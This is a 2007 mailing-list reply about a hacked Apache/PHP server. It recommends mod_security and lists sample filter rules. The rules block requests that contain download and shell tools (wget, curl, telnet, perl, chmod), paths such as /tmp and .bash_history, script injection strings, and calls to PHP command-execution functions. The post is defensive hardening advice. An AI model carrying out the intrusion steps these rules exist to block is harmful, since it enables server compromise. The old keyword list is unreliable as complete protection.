[thelist] Server Hacked

Mark Groen evolt at markgroen.com
Mon Feb 19 11:01:36 CST 2007


On Monday 19 February 2007 05:18, Hershel Robinson wrote:
> > Do you think it could be a cross site scripting problem?
> > I've seen that type of thing before. Is it an Apache+PHP) server? If
> > so, grep the word iframe in your log file (or maybe the world
> > newhold). That way you'll find the offending IP.
>
> Cross-site scripting? On the server, the index.php page was edited. I
> have no explanation aside from to say that someone got on the server.
> Whether they 'broke' in or somehow found the password for FTP somewhere
> I can not say.
>
> Hopefully the host will have a response. When they wake up this morning. :)

Using WHM/cpanel? Ask them if they have, or you can add mod_security to the 
WHM addons (scripts) usually found at the bottom of the left-hand links.

Sample config for same:

SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "/config.php?v=1&DIR "
SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "
SecFilterSelective THE_REQUEST "arta\.zip "
SecFilterSelective THE_REQUEST "cmd=cd\x20/var "
SecFilterSelective THE_REQUEST "HCL_path=http "
SecFilterSelective THE_REQUEST "clamav-partial "
SecFilterSelective THE_REQUEST "vi\.recover "
SecFilterSelective THE_REQUEST "netenberg "
SecFilterSelective THE_REQUEST "psybnc "
SecFilterSelective THE_REQUEST "fantastico_de_luxe "
SecFilterSelective THE_REQUEST "dc.txt "
SecFilterSelective THE_REQUEST "cd /var/spool/samba "
SecFilterSelective THE_REQUEST "chmod "
SecFilterSelective THE_REQUEST "perl "
SecFilterSelective THE_REQUEST "uname -a"
SecFilterSelective THE_REQUEST "\.htgroup"
SecFilterSelective THE_REQUEST "\.htaccess"
SecFilter "javascript\://"
SecFilter "img src=javascript"
SecFilterSelective THE_REQUEST "cd\.\."
SecFilterSelective THE_REQUEST "///cgi-bin"
SecFilterSelective THE_REQUEST "/cgi-bin///"
SecFilterSelective THE_REQUEST "/~root"
SecFilterSelective THE_REQUEST "/~ftp"
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"
SecFilterSelective THE_REQUEST "/htgrep" log,pass
SecFilterSelective THE_REQUEST "/\.history"
SecFilterSelective THE_REQUEST "/\.bash_history"
SecFilterSelective THE_REQUEST "/~nobody"
SecFilterSelective THE_REQUEST "<script"
SecFilterSelective THE_REQUEST "\?STRENGUR"
SecFilter "_PHPLIB\[libdir\]"
SecFilterSelective REQUEST_URI "/viewtopic\.php\?" chain
SecFilterSelective ARGS "(chr|fwrite|fopen|system|echr|passthru|popen|
proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|
proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|
posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(([0-9a-fA-Fx]{1,3})\)"

-- 
cheers,

        mark



More information about the thelist mailing list